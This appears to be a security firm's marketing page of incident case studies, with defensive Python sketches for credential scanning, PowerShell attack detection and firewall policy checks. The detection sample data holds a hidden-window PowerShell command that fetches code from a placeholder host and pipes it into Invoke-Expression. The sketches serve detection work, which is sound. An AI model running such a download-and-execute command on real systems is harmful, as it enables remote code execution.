Sensitive Credential Exposure — Box Drive

Exposed Passwords. Sitting in Plain Sight. Found Before the Attackers Did.

FirmaTRUST SOC Team | Data Exposure | Cloud Security | Compliance

“The FirmaTRUST SOC team caught what we missed — credentials sitting exposed in a personal folder. Their response was swift, their guidance was practical, and they didn’t just fix the symptom. They pushed us toward a proper password vault solution that eliminates the risk entirely.”

— Chief Financial Officer, Financial Services Industry

THE DISCOVERY

A file sitting in a personal Box Drive folder. No alerts triggered. No flags raised. To the naked eye, nothing unusual.

But FirmaTRUST’s SOC was watching. AI-driven monitoring surfaced the file and flagged it for human review. What analysts found was a plaintext credential store — usernames, passwords, sensitive access details — sitting exposed in a shared cloud environment accessible far beyond its intended audience.

The client had no idea it was there. The attackers hadn’t found it yet.
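As an added illustration (not FirmaTRUST's tooling, and not the client's files), the following Python sketch shows the kind of heuristic a content-monitoring pipeline can apply to documents in a shared cloud folder to surface plaintext credential stores for analyst review. The sample documents, the field-name patterns and the triage thresholds are all constructed assumptions.

```python
import re

# Constructed sample documents standing in for files found in a cloud folder
# (assumed content, not the client's files).
SAMPLE_FILES = {
    "Finance/vendor_logins.txt": (
        "Bank portal\nusername: treasury.ops\npassword: Summer2024!\n\n"
        "Payroll SaaS\nuser: hr_admin\npwd: Payr0ll#22\n"
    ),
    "Shared/team_lunch.txt": "Friday 12:30, order by Thursday. Sarah: pasta; Lee: salad.\n",
    "IT/notes.md": "Remember to rotate the API token. api_key=sk_live_EXAMPLE_0000000000\n",
}

# Field names that usually introduce a secret or an account identifier.
SECRET_FIELD = re.compile(
    r"\b(password|passwd|pwd|secret|api[_ -]?key|token)\s*[:=]\s*(\S+)", re.I)
USER_FIELD = re.compile(r"\b(username|user|login|account)\s*[:=]\s*(\S+)", re.I)


def mask(value):
    """Keep only a two-character prefix so reports never repeat the secret."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def scan_text(text):
    """Count credential-looking fields in one document and return masked samples."""
    secrets = [v for _, v in SECRET_FIELD.findall(text)]
    users = [v for _, v in USER_FIELD.findall(text)]
    return {
        "secret_fields": len(secrets),
        "user_fields": len(users),
        "samples": [mask(v) for v in secrets],
    }


def classify(findings):
    """Map counts to a triage label; thresholds are assumptions, tune per environment."""
    if findings["secret_fields"] >= 2 or (findings["secret_fields"] and findings["user_fields"]):
        return "credential-store"   # several secrets, or user/secret pairs: escalate
    if findings["secret_fields"] == 1:
        return "possible-secret"    # one stray key or token: lower-priority review
    return "clean"


def scan_files(files):
    """Triage label per path; the caller escalates anything not 'clean'."""
    return {path: classify(scan_text(text)) for path, text in files.items()}


if __name__ == "__main__":
    for path, label in scan_files(SAMPLE_FILES).items():
        print(f"{label:17} {path}")
```

The masking step matters in practice: an alert that quotes the discovered password in full is itself a second copy of the secret in the ticketing system, so the report carries only a prefix and the analyst opens the original under controlled access.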

THE RESPONSE

The team moved fast. The file was analyzed, the risk validated, and remediation steps executed immediately. Access was locked down. Monitoring was expanded. And rather than closing the ticket and moving on, the SOC team did something most vendors don’t — they fixed the underlying problem.

Accretive Wealth was guided toward an enterprise password vault solution. No more plaintext. No more exposure risk. The vulnerability that allowed this to happen was closed permanently.

WHAT FIRMATRUST SOC DID

  • AI + human monitoring — detected exposed credential file in a Box Drive personal folder before any unauthorized access occurred
  • Risk validation — performed detailed activity analysis to confirm exposure scope and assess potential impact
  • Immediate remediation — renamed and restricted the file to authorized personnel, eliminating public exposure
  • Continuous monitoring — activated persistent surveillance for unauthorized access attempts against the affected assets
  • Root cause resolution — identified insecure password storage practices as the systemic issue, not just the file
  • Strategic guidance — recommended and supported adoption of an enterprise password vault to eliminate recurrence

OUTCOME

Exposure Risk Eliminated

Credentials locked down before any attacker found them

Insecure Storage Resolved

File remediated, access restricted, monitoring activated

Security Posture Improved

Strategic path to enterprise password vault established

WHY IT MATTERS

Most credential exposures aren’t discovered by the company — they’re discovered by attackers. FirmaTRUST’s continuous SOC visibility across cloud environments means risks like this get caught and closed before they become breaches. We don’t just detect. We fix the root cause.

Click Fix Supply Chain Attack

Threat Detected. Contained. Neutralized – Before it Could Execute.

FirmaTRUST SOC & DFIR Team | Incident Response | Threat Intelligence

“The attack came through a vendor website we trusted, invisible to the users who triggered it. The FirmaTRUST SOC team detected the anomalous PowerShell activity across three endpoints simultaneously, correlated the threat, and contained it before any payload executed. This is exactly the kind of coverage we cannot build in-house.”

— Vice President, IT, Life Sciences and Biotechnology

THE INCIDENT

Three employees accessed their trusted vendor’s website — standard, routine business activity. What none of them knew: that site had been silently compromised.

In the background, malicious scripts were fired. A multi-stage ClickFix attack launched — PowerShell commands designed to download and execute harmful payloads across all three endpoints simultaneously. The attack was invisible at the user level. Perfectly camouflaged as legitimate traffic.

It didn’t get far.

WHAT FIRMATRUST SOC DID

  • Detected anomalous PowerShell execution across three endpoints in real time using Microsoft Defender telemetry and behavioral analytics
  • Correlated the threat across all affected devices — confirming attacker-controlled infrastructure and staged malware deployment
  • Immediately blocked attacker IPs, malicious domains, and payload delivery mechanisms
  • Contained all affected systems before lateral movement could be established
  • Guided full remediation: endpoint isolation, IOC blocking, and system cleansing
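To make the detection-and-correlation step concrete, here is an added Python example (written for this page, not FirmaTRUST's detection content and not Microsoft Defender's query language). It scores process-creation events for PowerShell indicators that fit a user-triggered ClickFix chain and then correlates suspicious events across endpoints by the remote host they contact, reporting any host contacted from several endpoints inside a short window. The event records, hostnames, timestamps and the .invalid domain are constructed; the indicator list is a minimal assumed set, not a complete rule.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (assumed shape, not real Defender telemetry):
# host, ISO timestamp, parent image, full command line.
SAMPLE_EVENTS = [
    {"host": "WS-101", "ts": "2024-05-02T09:14:03", "parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -nop -c "iwr http://updates.example.invalid/chk | iex"'},
    {"host": "WS-117", "ts": "2024-05-02T09:14:41", "parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -nop -c "iwr http://updates.example.invalid/chk | iex"'},
    {"host": "WS-142", "ts": "2024-05-02T09:16:10", "parent": "explorer.exe",
     "cmd": 'powershell.exe -w hidden -nop -c "iwr http://updates.example.invalid/chk | iex"'},
    # Benign admin script run from a console: should not be flagged.
    {"host": "WS-205", "ts": "2024-05-02T11:02:55", "parent": "cmd.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

# Per-event indicators: hidden window, encoded command, a download cradle, and
# piping fetched content straight into the interpreter.
INDICATORS = {
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download-cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "inline-eval": re.compile(r"\biex\b|invoke-expression", re.I),
}
# Parents that imply an interactive user launched the shell (e.g. pasted into Run).
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
URL_HOST = re.compile(r"https?://([^\s/\"']+)", re.I)


def indicators_for(event):
    """Names of indicators matched by one event (empty list for benign events)."""
    if not event["cmd"].lower().lstrip().startswith(("powershell", "pwsh")):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]
    if hits and event["parent"].lower() in USER_FACING_PARENTS:
        hits.append("user-facing-parent")
    return hits


def correlate(events, min_hosts=2, window=timedelta(minutes=15)):
    """Group suspicious events by the remote host they contact and report any
    remote host reached from at least min_hosts distinct endpoints inside window."""
    by_remote = defaultdict(list)
    for ev in events:
        hits = indicators_for(ev)
        if not hits:
            continue
        m = URL_HOST.search(ev["cmd"])
        remote = m.group(1).lower() if m else "<no-url>"
        by_remote[remote].append((datetime.fromisoformat(ev["ts"]), ev["host"], hits))

    findings = []
    for remote, evs in by_remote.items():
        evs.sort(key=lambda e: e[0])
        first_seen = evs[0][0]
        hosts = sorted({h for ts, h, _ in evs if ts - first_seen <= window})
        if len(hosts) >= min_hosts:
            findings.append({
                "remote": remote,
                "hosts": hosts,
                "first_seen": first_seen.isoformat(),
                "indicators": sorted({i for _, _, hs in evs for i in hs}),
            })
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f['remote']} contacted from {len(f['hosts'])} hosts "
              f"since {f['first_seen']}: {', '.join(f['indicators'])}")
```

The single-endpoint score alone would fire on one machine; the cross-host grouping is what turns three separate alerts into one incident with a shared remote host, which is also the artifact to block first.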

OUTCOME

Threat Neutralized Early-Stage

No Critical Systems Impacted

Supply Chain Vector Blocked

WHY IT MATTERS

This incident proves what continuous monitoring delivers: the ability to detect and stop advanced, user-triggered attacks before they cause damage. Traditional trust boundaries failed — FirmaTRUST’s SOC didn’t.

Phishing Attack & Ransomware Prevention

Credentials Stolen. Ransomware Deployed. Stopped Cold — Zero Files Encrypted.

FirmaTRUST SOC & DFIR Team | Ransomware Prevention | Phishing

“A sophisticated phishing attack led to full account compromise — the attacker was already moving laterally across email, Microsoft Teams, and OneDrive when the FirmaTRUST SOC team intervened. They stopped the ransomware before a single file was encrypted. The speed and precision of their response were remarkable.”

— Vice President, Finance & Operations, Life Sciences and Biotechnology

THE ATTACK

It started with a single email. Legitimate-looking. A document link. One click, and the user was walked through a chain of fake login pages that harvested their credentials and one-time password in real time.

The attacker moved immediately. Email, Teams, OneDrive, critical applications — all compromised within minutes. They registered new authentication methods to lock out the real user and began distributing renamed files internally and to external vendors. Ransomware execution files were already staged and ready to detonate.

FirmaTRUST’s SOC was faster.

THE RESPONSE

Our team detected the breach at the point of unauthorized access — flagged by unusual location, unknown device, and behavioral anomalies that no static rule would catch. From there, the response was immediate and surgical.

Every vector was shut down simultaneously. No lateral escape routes. No time for the ransomware to execute.

WHAT FIRMATRUST SOC DID

  • AI + human monitoring — detected unauthorized access from an anomalous location and unrecognized device in real time
  • Phishing infrastructure identified — exposed credential-harvesting pages and OTP theft activity before threat-intelligence feeds had flagged the infrastructure
  • Cloud-wide containment — stopped attacker activity across email, Teams, OneDrive, and all connected applications simultaneously
  • Ransomware neutralized — identified and blocked every execution file during active threat hunting, before detonation
  • Full environment sweep — removed all malicious files and contained the infection across the environment
  • IOC blocking — pushed all related indicators of compromise across every security control
  • Account secured — revoked attacker access, removed unauthorized auth methods, and fully restored the compromised account

OUTCOME

Zero Encryption or Data Loss

Ransomware blocked before a single file was touched

Ransomware Prevented

Every execution file identified and neutralized

Environment Secured

Attacker access revoked, all IOCs blocked

WHY IT MATTERS

Ransomware doesn’t announce itself. It moves fast, hides in trusted traffic, and strikes when defenses are looking elsewhere. This case proves that speed and precision matter more than perimeter walls. FirmaTRUST’s SOC caught a live, multi-stage attack mid-execution — and ended it before it cost a single file.

Insider Threat & Data Exfiltration

Detected. Investigated. Shut Down — Before the Data Left.

FirmaTRUST SOC & DFIR Team | Incident Response | Threat Intelligence

“When suspicious activity was detected in our environment, the FirmaTRUST SOC and DFIR team responded without delay. They didn’t just contain the incident — they uncovered unauthorized tools, strengthened our controls, and left our security posture measurably better than before.”

— Chief Operations Officer, Life Sciences and Biotechnology

THE SITUATION

The company flagged something unusual. Suspicious system activity. Possible unauthorized data movement. The kind of signal most organizations miss — or investigate too slowly.

FirmaTRUST’s SOC (Security Operations Center) and DFIR (Digital Forensics and Incident Response) teams were engaged immediately. The question wasn’t whether something was wrong. The question was: how far had it gone?

THE INVESTIGATION

Our DFIR team went deep. Forensic analysis of the affected system surfaced unauthorized tools and programs specifically designed to move data outside approved channels — tools that had no business being there.

We didn’t just find the problem. We mapped the full blast radius: every affected system, every unauthorized application, every gap in visibility that allowed this to happen in the first place.

WHAT FIRMATRUST DID

  • AI-driven detection — deployed policy rules and behavioral analytics to surface threats that proactive monitoring would have missed
  • Rapid response — engaged immediately on first report of suspicious activity, with no delays and no escalation lag
  • Deep-dive DFIR — full forensic investigation to assess scope, validate risk, and identify every exfiltration vector
  • Tool eradication — identified, blocked, and removed all unauthorized programs and transfer mechanisms
  • Environment-wide audit — swept all systems for non-approved software, not just the affected machine
  • Application control — implemented software whitelisting to prevent unauthorized tools from ever running again
  • Enhanced visibility — hardened detection capabilities so similar threats are caught earlier, faster

OUTCOME

Risk Contained

Threat stopped before data left the environment

Unauthorized Tools Removed

Every unapproved exfiltration vector eliminated

Controls Hardened

Whitelisting, app control & visibility locked in

WHY IT MATTERS

Insider threats are the hardest to catch — because the traffic looks normal. This case proves that when SOC monitoring and DFIR expertise work together, even the most subtle unauthorized activity gets exposed. FirmaTRUST doesn’t wait for damage reports. We prevent them.

Unlocking AI-Driven Productivity with Copilot Integration

The Challenge

A global investment firm at the forefront of genomics and precision health needed to operationalize AI across the enterprise.

But critical barriers stood in the way:

  • Documents siloed across Box and Dropbox
  • No unified access within Microsoft 365 Copilot
  • Complex, unreliable integrations—especially with Box
  • Emerging vendor changes introducing long-term risk

The objective was clear:

Enable seamless, AI-powered access to knowledge—without disruption, risk, or replatforming.

The FirmaTRUST Solution

FirmaTRUST delivered a fully integrated, organization-wide Copilot solution—combining deep technical execution with strategic foresight.

Unified AI-Powered Document Access

  • Integrated Box and Dropbox directly into Microsoft 365 Copilot
  • Enabled users to search, summarize, and interact with content using natural language
  • Delivered instant, org-wide deployment—no user setup required

Execution Where Others Failed

  • Successfully implemented Dropbox integration with seamless deployment
  • Solved complex Box integration challenges—including authentication, permissions, and indexing
  • Overcame issues that required deep escalation beyond standard vendor support

Strategic Insight That Matters

  • Identified a critical shift: Box Connector is no longer supported
  • Provided executive-level guidance on:
    • Risk exposure from deprecated integrations
    • Box’s transition to its proprietary AI Agent platform
    • Long-term content and AI strategy alignment

The Results

  • One unified AI interface across multiple content platforms
  • Immediate productivity gains with zero user friction
  • Elimination of data silos across Box and Dropbox
  • Faster decision-making through AI-powered insights
  • Future-ready strategy aligned with evolving vendor ecosystems

The Impact

FirmaTRUST transformed fragmented systems into a centralized, intelligent knowledge engine.

  • Increased operational efficiency
  • Reduced integration risk
  • Enabled enterprise-wide AI adoption
  • Positioned the firm for the next generation of work

Why FirmaTRUST

AI is powerful—but only if it’s implemented right.

When complexity is high and the stakes are higher, organizations don’t experiment.

They partner with FirmaTRUST.

Design and implement a secure and compliant IT infrastructure that integrates both cloud and on-premises solutions, tailored for a growing biotechnology startup.

Overview

A venture-backed biotechnology startup that initially operated in stealth mode transitioned into building out a new office and laboratory facility, requiring a secure, scalable, and cost-effective IT infrastructure. The organization partnered with FirmaTRUST to design and implement a modern hybrid environment that could support both confidentiality during stealth operations and rapid operational expansion. The client required a hybrid architecture combining on-premises systems with AWS cloud services, while maintaining strict confidentiality, regulatory readiness, and robust cybersecurity controls.

Business Challenges

  • Stealth Mode Operations: Extreme confidentiality requirements with minimal digital footprint and controlled access to sensitive research data.
  • Lab Security Requirements: Protection of proprietary research, instruments, and data within on-site laboratory environments.
  • Rapid Scaling Needs: Infrastructure capable of supporting fast team growth without re-architecture.
  • Cost Efficiency: Balancing enterprise-grade security with startup budget constraints.
  • Compliance Readiness: Preparing for future regulatory frameworks (GxP and industry-specific standards).

The FirmaTRUST Solution

FirmaTRUST designed and deployed a hybrid IT architecture integrating secure on-premises infrastructure with AWS cloud services. The solution emphasized layered security, network segmentation, identity management, and high availability.

Core Architecture Components

  • Hybrid Cloud Design:
    • AWS used for scalable compute, storage, and secure data processing
    • On-prem infrastructure supporting lab equipment, low-latency workloads, and secure local access
  • Enterprise Platforms:
    • Microsoft 365 for identity, MDM, SSO/MFA, collaboration, and productivity
    • AWS for cloud-native computational workloads and secure storage
  • Network & Security Stack:
    • Palo Alto Networks and Zscaler for advanced threat protection and secure access
    • Aruba and Cisco for enterprise-grade switching and wireless networking

Security-First Design

Security was embedded into every layer of the infrastructure, with special emphasis on protecting the laboratory environment.

Network Segmentation (VLAN Architecture)

A highly segmented network design was implemented using VLANs to isolate critical systems:

  • Corporate VLAN: User devices and general business operations
  • Lab VLAN: Dedicated to laboratory equipment and research systems
  • Guest VLAN: Internet-only access with strict isolation
  • Management VLAN: Restricted administrative access for IT systems

Key Benefits:

  • Prevents lateral movement across network zones
  • Limits exposure of sensitive lab systems
  • Enables granular policy enforcement

Firewall & Policy Enforcement

Advanced firewall rule sets were configured to strictly control traffic between VLANs:

  • Default deny-all posture between segments
  • Explicit allow rules for required services only
  • Deep packet inspection for sensitive traffic
  • Logging and monitoring for audit trails

Lab environment protections included:

  • No direct internet access from lab VLAN
  • Controlled access via secure jump hosts
  • Strict east-west traffic inspection
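The segmentation and firewall policy described in the two lists above can be expressed as data and checked before it is pushed to the firewalls. The Python below is an added example written for this page: it is not the client's rule set and not Palo Alto Networks configuration syntax. The VLAN address ranges, the jump host address and the permitted ports are constructed assumptions. It models the default-deny posture with an explicit allow list, pins corporate-to-lab access to the jump host, denies lab egress to the internet, emits one audit record per decision, and runs a set of policy invariants a reviewer would want to hold for any future rule change.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed addressing plan for the four VLANs (assumed, not the client's real plan).
SEGMENTS = {
    "corporate":  ip_network("10.10.0.0/16"),
    "lab":        ip_network("10.20.0.0/16"),
    "guest":      ip_network("10.30.0.0/16"),
    "management": ip_network("10.40.0.0/24"),
}
INTERNET = "internet"
LAB_JUMP_HOST = ip_address("10.20.0.10")   # assumed hardened jump host inside the lab VLAN


@dataclass(frozen=True)
class Rule:
    src: str                                 # segment name or "internet"
    dst: str
    ports: frozenset                         # permitted TCP destination ports
    dst_hosts: frozenset = frozenset()       # when non-empty, only these destination IPs
    note: str = ""


# The explicit allow list; anything not matched here falls to the default deny.
ALLOW_RULES = [
    Rule("corporate", INTERNET, frozenset({80, 443}), note="corporate web egress"),
    Rule("guest", INTERNET, frozenset({80, 443}), note="guest is internet-only"),
    Rule("corporate", "lab", frozenset({22, 3389}), frozenset({LAB_JUMP_HOST}),
         "lab reachable only through the jump host"),
    Rule("management", "lab", frozenset({22, 443}), note="IT administration of lab devices"),
    Rule("management", "corporate", frozenset({22, 443, 5985}), note="IT administration of corporate"),
]


def segment_of(ip):
    """Map an address to its VLAN name; anything outside the plan counts as internet."""
    addr = ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return INTERNET


def evaluate(src_ip, dst_ip, port):
    """First-match evaluation of a single flow: ('allow' | 'deny', reason)."""
    src, dst = segment_of(src_ip), segment_of(dst_ip)
    if src == dst and src != INTERNET:
        return "allow", "intra-segment traffic"
    for r in ALLOW_RULES:
        if r.src != src or r.dst != dst or port not in r.ports:
            continue
        if r.dst_hosts and ip_address(dst_ip) not in r.dst_hosts:
            continue
        return "allow", r.note
    return "deny", "default deny between segments"


def audit_line(src_ip, dst_ip, port):
    """One log record per decision, so denied attempts are visible to monitoring."""
    verdict, reason = evaluate(src_ip, dst_ip, port)
    return (f"{verdict.upper():5} {src_ip}->{dst_ip}:{port} "
            f"[{segment_of(src_ip)}->{segment_of(dst_ip)}] {reason}")


def policy_invariants(rules=ALLOW_RULES):
    """Checks a reviewer runs before pushing a rule set; returns a list of violations."""
    problems = []
    if any(r.src == "lab" and r.dst == INTERNET for r in rules):
        problems.append("lab VLAN must have no direct internet access")
    if any(r.src == "guest" and r.dst != INTERNET for r in rules):
        problems.append("guest VLAN must be internet-only")
    if any(r.src == "corporate" and r.dst == "lab" and not r.dst_hosts for r in rules):
        problems.append("corporate to lab must be pinned to jump hosts")
    if any(r.src == INTERNET for r in rules):
        problems.append("no inbound allow rules from the internet")
    return problems


if __name__ == "__main__":
    for flow in [("10.20.5.5", "93.184.216.34", 443),    # lab -> internet
                 ("10.10.1.20", "10.20.0.10", 22),       # corporate -> lab jump host
                 ("10.10.1.20", "10.20.7.7", 22),        # corporate -> lab instrument directly
                 ("10.30.1.1", "10.10.1.20", 445)]:      # guest -> corporate
        print(audit_line(*flow))
    print("invariant violations:", policy_invariants() or "none")
```

Keeping the invariants next to the rule set is the point: the two lists above are easy to satisfy on day one and easy to erode with a "temporary" allow rule later, and a check that fails the change pipeline is cheaper than discovering the gap during an incident.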

Identity & Endpoint Security

Single Sign-On (SSO)

  • Centralized identity management via Microsoft Entra ID (Azure AD)
  • Conditional access policies based on device compliance, location, and risk

Mobile Device Management (MDM)

  • Microsoft Intune deployed for device enrollment and policy enforcement
  • Ensured all endpoints meet security baseline before accessing resources

Endpoint Detection & Response (EDR)

  • Advanced EDR deployed across all endpoints
  • Real-time threat detection and automated response capabilities

Zero Trust Principles

  • Continuous verification of users and devices
  • Least-privilege access enforced across all systems

High Availability & Reliability

The infrastructure leveraged enterprise-grade, highly available technologies:

  • Redundant PAN firewall clusters
  • Aruba/Cisco switching with failover configurations
  • AWS multi-AZ deployments for resilience
  • Secure remote access via Zscaler and VPN redundancy

Cost Optimization Strategy

Despite enterprise-grade requirements, FirmaTRUST, as the managing MSP, implemented a cost-conscious approach:

  • Leveraged cloud elasticity to avoid overprovisioning
  • Standardized on integrated platforms (Microsoft 365, PAN) to reduce tooling sprawl
  • Phased deployment aligned with company growth
  • Optimized licensing models for startup efficiency

Results & Outcomes

Security

  • Fully segmented and protected lab environment
  • Zero Trust architecture minimizing risk exposure
  • Comprehensive monitoring and audit readiness

Scalability

  • Infrastructure supports rapid hiring and expansion
  • Cloud-native components enable seamless growth

Operational Efficiency

  • Centralized identity and device management
  • Streamlined onboarding and access control

Cost Effectiveness

  • Enterprise-grade security achieved within startup budget
  • Reduced long-term operational overhead

Conclusion

By combining a Palo Alto Networks security framework with a hybrid AWS architecture, we successfully delivered a secure, scalable, and cost-effective IT foundation for a stealth-mode biotech startup. The solution not only protected sensitive laboratory environments through advanced VLAN segmentation and firewall policies but also positioned the company for future growth, compliance, and innovation.

This engagement highlights how thoughtful design, strong security principles, and strategic technology selection can enable startups to operate with enterprise-level confidence from day one.

Why FirmaTRUST

When scaling globally, there is no margin for error.

You need precision.
You need consistency.
You need execution at scale.

FirmaTRUST delivers all three.

Ransomware Recovery & Hybrid Cloud Transformation for a Biotech Leader

Client Overview

A multi-location biotechnology company specializing in sensitive research and regulated data.

The Challenge

The client was hit by a sophisticated ransomware attack that:

  • Disrupted operations across multiple sites
  • Put critical research data at risk
  • Exposed gaps in security, visibility, and infrastructure resilience

They needed immediate containment—and a long-term solution to prevent it from happening again.

FirmaTRUST’s Approach

Rapid Incident Response

FirmaTRUST quickly mobilized to:

  • Identify and isolate compromised systems
  • Stop lateral movement across the network
  • Secure critical infrastructure within hours

Quarantine & Containment

Through advanced segmentation and access control:

  • Infected assets were contained immediately
  • Business-critical systems remained protected
  • The spread of ransomware was fully halted

Threat Intelligence-Driven Defense

Using real-time threat intelligence, FirmaTRUST:

  • Identified the ransomware variant and attack patterns
  • Blocked malicious indicators across the environment
  • Strengthened detection and prevention capabilities

The Transformation

Following recovery, FirmaTRUST redesigned the company’s entire IT environment into a secure, scalable hybrid model.

Modern Hybrid Infrastructure

Built across on-premises and cloud environments using:

  • Microsoft 365 for secure productivity and identity
  • AWS for scalable cloud infrastructure
  • Palo Alto Networks for next-generation firewall protection
  • Cisco for high-performance networking
  • Infoblox for secure DNS and network services
  • Windows & Linux Servers for flexible workloads
  • NetApp for high-performance, resilient storage

Key Outcomes

Stronger Security

  • Zero Trust architecture with enhanced access controls
  • Advanced threat detection and continuous monitoring
  • Reduced attack surface across all locations

High Performance & Availability

  • Optimized workloads across hybrid cloud environments
  • Increased uptime and system reliability
  • Seamless connectivity between locations

Cost Efficiency

  • Reduced infrastructure costs through cloud optimization
  • Scalable resources aligned with business needs
  • Lower operational overhead with centralized management

Business Resilience

  • Rapid recovery capabilities with secure backup strategies
  • Improved compliance posture for biotech regulations
  • Long-term protection of sensitive intellectual property

The Result

FirmaTRUST not only stopped a critical ransomware attack—it transformed the client’s IT foundation. The organization now operates on a secure, high-performance, and cost-effective hybrid infrastructure designed to scale and withstand future threats.

Partner with FirmaTRUST

Looking to strengthen your security posture or modernize your infrastructure? FirmaTRUST delivers end-to-end solutions—from incident response to full-scale transformation.

Transforming IT into a Secure, Scalable Growth Engine

The Challenge

A high-potential biotech startup needed to focus on what mattered most—innovation and product development.

But there was a problem:

  • IT infrastructure lacked standardization and scalability
  • Security posture needed strengthening
  • Network performance and resilience were limiting growth

The company understood a critical truth:

Without a strong IT foundation, growth would stall.

The FirmaTRUST Solution

FirmaTRUST stepped in as a strategic IT transformation partner, delivering a structured, phased modernization of the entire environment.

We began with a comprehensive IT audit, then executed a long-term roadmap built for stability, security, and scale.

Strategic Modernization Approach

  • Developed a multi-phase IT transformation roadmap with detailed project plans, SOPWs, and BOMs
  • Executed improvements over 18 months—ensuring minimal disruption to daily operations

Infrastructure Optimization

  • Redesigned network architecture to eliminate inefficiencies (including removal of daisy-chained switches)
  • Implemented a hub-and-spoke model for improved performance and data flow
  • Enhanced server, storage, and overall system performance

Security & Stability Enhancements

  • Upgraded firewall systems with the latest secure and stable firmware
  • Conducted wireless spectrum analysis to optimize network performance
  • Strengthened Active Directory for resiliency across locations

Operational Excellence

  • Established vendor SLAs for improved reliability and support
  • Tested all changes in controlled environments before deployment
  • Applied a methodical, zero-disruption approach to every upgrade

We didn’t rush changes.
We engineered them—strategically, safely, and correctly.

The Results

  • Delivered a fully modernized, secure, and resilient IT environment
  • Improved network performance, reliability, and scalability
  • Enabled the client to focus entirely on innovation and business growth

The Impact

FirmaTRUST transformed a fragmented IT environment into a high-performing, future-ready infrastructure.

  • Reduced operational risk
  • Increased system stability
  • Established a scalable foundation for growth

Ongoing Partnership

This is not a one-time engagement.

FirmaTRUST continues to serve as a trusted technology partner, supporting, optimizing, and securing the client’s evolving environment.

Why FirmaTRUST

Growing companies don’t need reactive IT.
They need a partner who builds for the future.

FirmaTRUST delivers exactly that.

Achieving NIST 800-171 Compliance for Defense-Grade Security

The Challenge

As a U.S. government contractor, Stellar Solutions was required to meet NIST 800-171 compliance—a strict cybersecurity framework designed to protect Controlled Unclassified Information (CUI).

The stakes were mission-critical:

  • Compliance was mandatory to maintain DoD contracts
  • Security controls had to withstand sophisticated internal and external threats
  • Infrastructure, policies, and systems needed to align with federal standards

Anything less than full compliance was not an option.

The FirmaTRUST Solution

FirmaTRUST partnered closely with Stellar Solutions as a strategic cybersecurity and compliance advisor, driving the transformation required to meet NIST standards.

We delivered:

  • Comprehensive infrastructure assessment and remediation strategy
  • Deployment of next-generation firewalls and advanced security controls
  • Implementation of compliant VPN solutions for secure access
  • Integration of enterprise-grade security management tools
  • Hands-on collaboration with internal security teams to ensure full alignment with NIST 800-171 requirements

We didn’t just recommend changes—
we engineered a secure, compliant environment built for federal-grade demands.

The Results

  • Successfully achieved NIST 800-171 compliance
  • Strengthened overall cybersecurity posture across the organization
  • Enabled continued eligibility for critical DoD contracts

Ongoing Impact

FirmaTRUST continues to support Stellar Solutions in advancing their compliance maturity through:

  • CMMC (Cybersecurity Maturity Model Certification) readiness and implementation
  • Ongoing security enhancements and risk management

Compliance achieved. Security elevated. Mission secured.

Building a Secure, Scalable IT Infrastructure from Day One

The Challenge

A fast-growing biotech startup needed to transition from an incubator environment into its first fully operational facility—without compromising speed, security, or scalability.

The objective was clear:

  • Build a production-ready IT infrastructure from the ground up
  • Ensure enterprise-grade security and compliance from day one
  • Enable scientists and researchers to focus on innovation—not IT challenges

There was no room for delays, missteps, or rework.

The FirmaTRUST Solution

FirmaTRUST was engaged as a strategic IT and infrastructure partner, leading the end-to-end design and execution of a complete, secure technology environment.

We delivered:

End-to-End Infrastructure Design & Build

  • Collaborated directly with architects, general contractors, and construction teams to ensure IT was fully integrated into building design—not an afterthought
  • Designed structured cabling, network architecture, and data room (MDF/IDF) requirements

Connectivity & Core Systems

  • Coordinated with ISPs to deliver high-performance, reliable connectivity
  • Engineered secure network infrastructure with next-generation firewalls and edge protection

Modern Workplace & Cloud Architecture

  • Implemented a secure, cloud-first technology stack, including:
    • Identity & Access Management (Okta with SSO & MFA)
    • Microsoft 365 for collaboration and productivity
    • Mobile Device Management (Workspace ONE)

Security-First Approach

  • Embedded cybersecurity into every layer of the environment
  • Deployed endpoint protection, encryption, and threat management solutions
  • Leveraged best-in-class technologies from partners like VMware, Microsoft, Okta, and Carbon Black

Workplace Technology Integration

  • Designed and deployed fully equipped conference rooms and AV systems
  • Ensured optimal performance with acoustic planning and smart room technologies

The Results

  • Successfully launched a fully operational, enterprise-grade IT environment
  • Delivered a secure, scalable infrastructure ready for rapid growth
  • Enabled the client to focus entirely on research, innovation, and business expansion

The Impact

FirmaTRUST transformed an empty space into a high-performance, secure, and future-ready technology ecosystem.

  • Accelerated time to operational readiness
  • Eliminated infrastructure risk
  • Established a foundation for long-term scalability and compliance

Proven Expertise in Biotech

This is not a one-off success.

FirmaTRUST has led numerous “greenfield” IT builds across the San Francisco Bay Area—helping biotech startups scale into global, multi-national enterprises.

From lab startup to industry leader—FirmaTRUST builds the foundation.